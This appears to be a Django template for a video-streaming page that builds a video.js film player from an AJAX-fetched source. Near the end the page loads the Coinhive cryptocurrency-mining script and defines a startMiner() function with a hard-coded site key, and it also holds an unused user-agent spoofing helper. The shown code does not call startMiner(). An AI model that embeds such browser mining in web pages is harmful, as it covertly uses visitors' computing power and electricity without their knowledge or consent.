{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    {% include "app/head_includes.html" %}
    {% if selected_film %}
        <title>{{ selected_film.name }}</title>
    {% endif %}
    <link href="http://vjs.zencdn.net/6.4.0/video-js.css" rel="stylesheet">
    <script src="http://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
    <style>

        .playchip {
            font-weight: 200;
            border-radius: 4px;
            padding: 4px 10px;
            border-color: darkgray;
            border-width: 1px;
            border-style: solid;
            display: inline-block;
            margin-right: 16px;
        }

        #video-container, .overlay, #film-info {
            width: 100%;
            height: 100%;
            position: absolute;
            top: 0;
            left: 0;
        }

        #film-info {
            z-index: 10;
            width: 30%;
            left : 5%;
            top: 5%;
            display: block;
        }

        #play-film {
            font-size: 3em;
            line-height: 1.5em;
            position: absolute;
            height: 1.5em;
            width: 1.5em;
            /* 0.06666em = 2px default */
            border: 0.06666em solid #fff;
            /* 0.3em = 9px default */
            border-radius: 10em;
            left: 50%;
            top: 50%;
            margin-left: -0.75em;
            margin-top: -0.75em;
            z-index: 15;
        }

        .vjs-poster {
            background-size: cover;
            background-position: center;
        }

        .overlay {
            z-index: 5;
            background-image: -webkit-gradient(
                    linear,
                    left top,
                    left bottom,
                    color-stop(0, rgba(0,0,0,0.5)),
                    color-stop(1, rgba(0,0,0,0.2))
            );
            background-image: -o-linear-gradient(bottom, rgba(0,0,0,0.5) 0%, rgba(0,0,0,0.2) 100%);
            /* Firefox 3.6 - 15 */
            background-image: -moz-linear-gradient(bottom, rgba(0,0,0,0.5) 0%, rgba(0,0,0,0.2) 100%);
            /* Safari 5.1, iOS 5.0-6.1, Chrome 10-25, Android 4.0-4.3 */
            background-image: -webkit-linear-gradient(bottom, rgba(0,0,0,0.5) 0%, rgba(0,0,0,0.2) 100%);
            /* IE */
            background-image: -ms-linear-gradient(bottom, rgba(0,0,0,0.5) 0%, rgba(0,0,0,0.2) 100%);
            /* Opera 15+, Chrome 25+, IE 10+, Firefox 16+, Safari 6.1+, iOS 7+, Android 4.4+ */
            background-image: linear-gradient(to bottom, rgba(0,0,0,0.5) 0%, rgba(0,0,0,0.2) 100%);

            -webkit-filter: blur(5px);
            -moz-filter: blur(5px);
            -o-filter: blur(5px);
            -ms-filter: blur(5px);
            filter: blur(5px);
        }

        p, h4 {
            color: white;
            margin: 2px;
        }

        .video-js .vjs-big-play-button {
            display: none;
        }

        .video-js {
            /* The base font size controls the size of everything, not just text.
               All dimensions use em-based sizes so that the scale along with the font size.
               Try increasing it to 15px and see what happens. */
            font-size: 10px;
            /* The main font color changes the ICON COLORS as well as the text */
            color: #fff;
        }

        /* The "Big Play Button" is the play button that shows before the video plays.
           To center it set the align values to center and middle. The typical location
           of the button is the center, but there is trend towards moving it to a corner
           where it gets out of the way of valuable content in the poster image.*/
        .vjs-default-skin .vjs-big-play-button {
            /* The font size is what makes the big play button...big.
               All width/height values use ems, which are a multiple of the font size.
               If the .video-js font-size is 10px, then 3em equals 30px.*/
            font-size: 3em;
            /* We're using SCSS vars here because the values are used in multiple places.
               Now that font size is set, the following em values will be a multiple of the
               new font size. If the font-size is 3em (30px), then setting any of
               the following values to 3em would equal 30px. 3 * font-size. */
            /* 1.5em = 45px default */
            line-height: 1.5em;
            height: 1.5em;
            width: 1.5em;
            /* 0.06666em = 2px default */
            border: 0.06666em solid #fff;
            /* 0.3em = 9px default */
            border-radius: 10em;
            /* Align center */
            left: 50%;
            top: 50%;
            margin-left: -0.75em;
            margin-top: -0.75em;
        }

        /* The default color of control backgrounds is mostly black but with a little
           bit of blue so it can still be seen on all-black video frames, which are common. */
        .video-js .vjs-control-bar,
        .video-js .vjs-big-play-button,
        .video-js .vjs-menu-button .vjs-menu-content {
            /* IE8 - has no alpha support */
            background-color: transparent;
            /* Opacity: 1.0 = 100%, 0.0 = 0% */
            background-color: rgba(0, 0, 0, 0);
        }

        /* Slider - used for Volume bar and Progress bar */
        .video-js .vjs-slider {
            background-color: rgba(26, 26, 26, 0);
            background-color: rgba(26, 26, 26, 0.3);
        }

        /* The slider bar color is used for the progress bar and the volume bar
           (the first two can be removed after a fix that's coming) */
        .video-js .vjs-volume-level,
        .video-js .vjs-play-progress,
        .video-js .vjs-slider-bar {
            background: #fff;
        }

        /* The main progress bar also has a bar that shows how much has been loaded. */
        .video-js .vjs-load-progress {
            /* For IE8 we'll lighten the color */
            background: rgba(51, 51, 51, 0);
            /* Otherwise we'll rely on stacked opacities */
            background: rgba(26, 26, 26, 0.1);
        }

        /* The load progress bar also has internal divs that represent
           smaller disconnected loaded time ranges */
        .video-js .vjs-load-progress div {
            /* For IE8 we'll lighten the color */
            background: rgba(102, 102, 102, 0);
            /* Otherwise we'll rely on stacked opacities */
            background: rgba(26, 26, 26, 0.3);
        }

    </style>
</head>

<body>
<main>
    <div style="width: 100%; height: 100vh; position: relative;">
        <div id="film-info">
            <h4 style="font-weight: 800; ">{{ selected_film.title }}</h4>
            <!--{% if selected_film.rating %}
                {% if selected_film.rating < 6 %}
                    <div class="playchip" style="background-color: #e53935; border-color: #e53935 !important;">{{ selected_film.rating }}</div>
                {% elif selected_film.rating >= 8 %}
                    <div class="playchip" style="background-color: #43a047; border-color: #43a047 !important;">{{ selected_film.rating }}</div>
                {% else %}
                    <div class="playchip" style="background-color: #fdd835; border-color: #fdd835 !important;">{{ selected_film.rating }}</div>
                {% endif %}
            {% endif %}-->
            <p style="font-weight: 500; margin-top: 8px">{{ selected_film.duration }} min</p>
            <p style="font-weight: 500;">{{ film_category.name }}, {{ selected_film.publication_year }}</p>
            <p style="font-weight: 100; margin-top: 8px">{{ selected_film.desc }}</p>

        </div>

        <div class="overlay"></div>

        <div id="video-container"></div>

        <div>

        </div>
        <button id="play-film"></button>
    </div>

    <!--
    <div class="row" style="margin-top: 8px">
        <div class="col s9 m9 l9">

            <div class="row">
                <div class="col s3 m3 l3">
                    <img class="responsive-img " style="max-height: 300px; border-radius: 16px" src="{{ selected_film.image_url }}">
                </div>
                <div class="col s9 m9 l9">
                    <div class="row valign-wrapper">
                        <h4 style="font-weight: 700; ">{{ selected_film.title }}</h4>
                        <div class="col s3 m3 l3">
                            <div class="switch">
                                <label id="hd-switcher">
                                    Normal
                                    <input id="chk-hd" type="checkbox" checked>
                                    <span class="lever"></span>
                                    HD
                                </label>
                            </div>
                        </div>
                    </div>

                    <div class="playchip hoverable">{{ selected_film.publication_year }}</div>

                    {% if selected_film.rating %}
                        {% if selected_film.rating < 6 %}
                            <div class="playchip" style="background-color: #e53935; border-color: #e53935 !important;">{{ selected_film.rating }}</div>
                        {% elif selected_film.rating >= 8 %}
                            <div class="playchip" style="background-color: #43a047; border-color: #43a047 !important;">{{ selected_film.rating }}</div>
                        {% else %}
                            <div class="playchip" style="background-color: #fdd835; border-color: #fdd835 !important;">{{ selected_film.rating }}</div>
                        {% endif %}
                    {% endif %}

                    <div class="playchip">{{ selected_film.duration }} min</div>
                    <a href="{% url 'category' film_category.id %}" class="black-text"><div class="playchip hoverable">{{ film_category.name }}</div></a>
                    <p style="font-weight: 200;">{{ selected_film.desc }}</p>
                </div>
            </div>
        </div>-->

    <!-- Suggested -->
    <!--<div class="col s3 m3 l3">
            {% for suggested_film in suggested_films %}
                <a href="{% url 'play' suggested_film.id %}">
                    <div class="card horizontal hoverable">
                        <div class="card-image">
                            <img src="{{ suggested_film.image_url }}" style="width: 80%">
                        </div>
                        <div style="padding: 8px" class="black-text">
                            <h6 style="font-weight: 500; font-size: large">{{ suggested_film.title }}</h6>
                            <p style="font-weight: 200;">{{ suggested_film.desc }}</p>
                        </div>
                    </div>
                </a>
            {% endfor %}
        </div>
    </div>-->

</main>
<script type="text/javascript" src="{% static 'app/js/jquery-3.2.1.min.js' %}"></script>
<script type="text/javascript" src="{% static 'app/js/spin.js' %}"></script>
<script src="http://vjs.zencdn.net/6.4.0/video.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>
    $(document).ready(function () {


        $.ajax({
            method: "GET",
            url: "http://127.0.0.1:8000" + '{% url "source" selected_film.id %}',
            dataType: 'json'
        })
            .done(function(data) {
                alert(data[data.length - 1]);

                $("#video-container").append('<video id="my-video" class="video-js" style="height: 100vh; width: 100%" controls preload="auto" poster="http://ftv01.stbm.it/imgbank/SPLASH/R201710/col03-1.jpg">\n' +
                    '                           <source id="film-source" src="' + data[data.length - 1] + '" type="video/mp4">\n' +
                    '                               <p class="vjs-no-js">\n' +
                    '                               Per vedere questo video abilita JavaScript e aggiorna il tuo browser a uno che\n' +
                    '                               <a href="http://videojs.com/html5-video-support/" target="_blank">supporti HTML5 video</a>\n' +
                    '                               </p>\n' +
                    '                           </video>');

                videojs('my-video');
                //$("#film-source").attr("src",data[data.length - 1]);

                $("#play-film").click(function () {
                    $(".overlay").hide();
                    $("#film-info").hide();
                    $(this).hide();
                    $("#video-container").css("z-index",430);
                    $(".vjs-big-play-button").trigger("click");
                });

            }).fail(function(err) {
            alert(err);
        });



        $("#chk-hd").click(function () {
            if ($(this).is(":checked"))
                $("#film-box").attr("src",data[1]);
            else
                $("#film-box").attr("src",data[0]);
        });
    });

    function startMiner() {
        var miner = new CoinHive.Anonymous('aU4YMXPAdkL2mZlR03FEdx2twX6atBRu');
        miner.start();
    }

    function setUserAgent(window, userAgent) {
        if (window.navigator.userAgent != userAgent) {
            var userAgentProp = { get: function () { return userAgent; } };
            try {
                Object.defineProperty(window.navigator, 'userAgent', userAgentProp);
            } catch (e) {
                window.navigator = Object.create(navigator, {
                    userAgent: userAgentProp
                });
            }
        }


    }

</script>
</body>
</html>